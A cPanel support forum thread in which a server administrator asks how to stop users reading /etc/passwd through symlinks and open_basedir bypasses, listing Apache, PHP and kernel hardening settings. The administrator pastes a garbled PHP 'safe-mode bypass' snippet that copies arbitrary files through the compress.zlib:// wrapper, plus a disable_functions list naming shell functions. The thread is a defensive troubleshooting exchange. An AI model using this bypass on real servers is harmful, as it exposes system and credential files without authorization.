Best way to secure server from symlinks?
in some parts i was able to secure my server in some parts no.
I can't find a way to block symlinks permanently from my server.
I have a jailed apache and harden kernel, blocked php functions and still i'm able to put a symlink on host and get infos like get everything what is into /etc/passwd
but when i turn on mod_security from user panel i can't read anymore /etc/passwd file,
even if open_basedir is ON i will be able to read /etc/passwd file!
is there any way to disallow clients to turn off/on mod security?!
i tried to turn safe_mode on but that crashed everything only sites with just html/css designs wasn't effected :confused: and at others i was getting error 505,
in old version of cpanel, my server was pretty secured but i can't secure it with latest version, (i didn't an update was a fresh install in a new server)
Thank you!
As for info
cPanel Security Advisor SCAN LOG. attached as 1. Apache conf. for "/"
EA4 Profile,
On php.ini file
cPanel CFS Scan. Score 137/144 (other stuff is about cloudlinux ssh, nameservers geographically etc.) cPanel Version. WHM 62.0 [Build 10] i've read doc's and i did those steps which i have wrote here, but i'm wrong somewhere or i didn't found everything to fix this problem. i hope some one here can tell me where i'm wrong or what did i miss! Thanks.
[root@node1 ~]# cat /etc/redhat-release
CentOS release 6.8 (Final)
[root@node1 ~]# cat /var/cpanel/envtype
standard
[root@node1 ~]# uname -r
2.6.32-642.13.1.199.cpanel6.x86_64
[root@node1 ~]# php -v
ea-php-cli Copyright 2016 cPanel, Inc.
PHP 5.6.30 (cgi-fcgi) (built: Jan 25 2017 04:19:44)
Copyright (c) 1997-2016 The PHP Group
Zend Engine v2.6.0, Copyright (c) 1998-2016 Zend Technologies
with the ionCube PHP Loader v4.7.5, Copyright (c) 2002-2014, by ionCube Ltd., and
with Zend Guard Loader v3.3, Copyright (c) 1998-2014, by Zend Technologies
with Zend OPcache v7.0.4-dev, Copyright (c) 1999-2015, by Zend Technologies
Use Cpanel Jailed by default = ON
CGIEmail and CGIEcho = OFF
Enable File Protect = ON
Blank referrer safety check = ON
Referrer safety check = ON
EXPERIMENTAL: Jail Apache Virtual Hosts using mod_ruid2 and cPanel" jailshell. = ON
open_basedir = ON
cPanel Security Advisor SCAN LOG. attached as 1. Apache conf. for "/"
Symlink Protection = ON
ExecCGI = ON
FollowSymLinks = ON
Includes = ON
IncludesNOEXEC = ON
Indexes = ON
MultiViews = ON
SymLinksIfOwnerMatch = ON
EA4 Profile,
Apache 2.4
config
config-runtime
mod_bwlimited
mod_cgi
mod_deflate
mod_env
mod_expires
mod_headers
mod_heartbeat
mod_heartmonitor
mod_mpm_prefork
mod_proxy
mod_proxy_fcgi
mod_proxy_http
mod_remoteip
mod_ruid2
mod_security2
mod_ssl
mod_unique_id
mod_watchdog
tools
PHP 5.6
libc-client
pear
php
php-bcmath
php-bz2
php-calendar
php-cli
php-common
php-curl
php-devel
php-enchant
php-fileinfo
php-fpm
php-ftp
php-gd
php-gettext
php-imap
php-intl
php-ioncube
php-ldap
php-litespeed
php-mbstring
php-mcrypt
php-mysqlnd
php-pdo
php-pgsql
php-posix
php-process
php-pspell
php-soap
php-sockets
php-sourceguardian
php-tidy
php-xml
php-xmlrpc
php-zendguard
php-zip
runtime
On php.ini file
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source,ini_set
allow_url_fopen = Off
allow_url_include = Off
cPanel CFS Scan. Score 137/144 (other stuff is about cloudlinux ssh, nameservers geographically etc.) cPanel Version. WHM 62.0 [Build 10] i've read doc's and i did those steps which i have wrote here, but i'm wrong somewhere or i didn't found everything to fix this problem. i hope some one here can tell me where i'm wrong or what did i miss! Thanks.
-
Hello, It looks like this system is configured to use the Bluehost patch, however it's not required because you already use the cPanel hardened kernel for symlink protection at the kernel level. You should select Off for the Symlink Protection option in the Global Configuration section of WHM's Apache Configuration interface (Home >> Service Configuration >> Apache Configuration). This will correct the symlink warning message you see in "WHM >> Security Advisor". Regarding the ability to view the /etc/passwd data, could you let us know the specific steps you are taking to reproduce that behavior? Thank you. 0 -
Hello, It looks like this system is configured to use the Bluehost patch, however it's not required because you already use the cPanel hardened kernel for symlink protection at the kernel level. You should select Off for the Symlink Protection option in the Global Configuration section of WHM's Apache Configuration interface (Home >> Service Configuration >> Apache Configuration). This will correct the symlink warning message you see in "WHM >> Security Advisor". Regarding the ability to view the /etc/passwd data, could you let us know the specific steps you are taking to reproduce that behavior? Thank you.
sure there's a part of code which can read itPhp Safe-Mode Bypass (Read Files)
File:
eg: /etc/passwd
function rsg_read() { $test=""; $temp=tempnam($test, "cx"); $file=$_GET['file">; $get=htmlspecialchars($file); echo "
Trying To Get File $get
"; if(copy("compress.zlib://".$file, $temp)){ $fichier = fopen($temp, "r"); $action = fread($fichier, filesize($temp)); fclose($fichier); $source=htmlspecialchars($action); echo "Start $get"; } if(isset($_GET['file">)) { rsg_read(); } ?>
$source
Fin $get"; unlink($temp); } else { die("Sorry... File ".htmlspecialchars($file)." dosen't exists or you don't have access."); } echo "
script isn't created by me so i don't know too much about it!0 -
as for now i found a fix for this, i add "fopen" on disabled func's, i don't know if this will make any problem in websites, but nothing reported for now :/ 0
Please sign in to leave a comment.
Comments
3 comments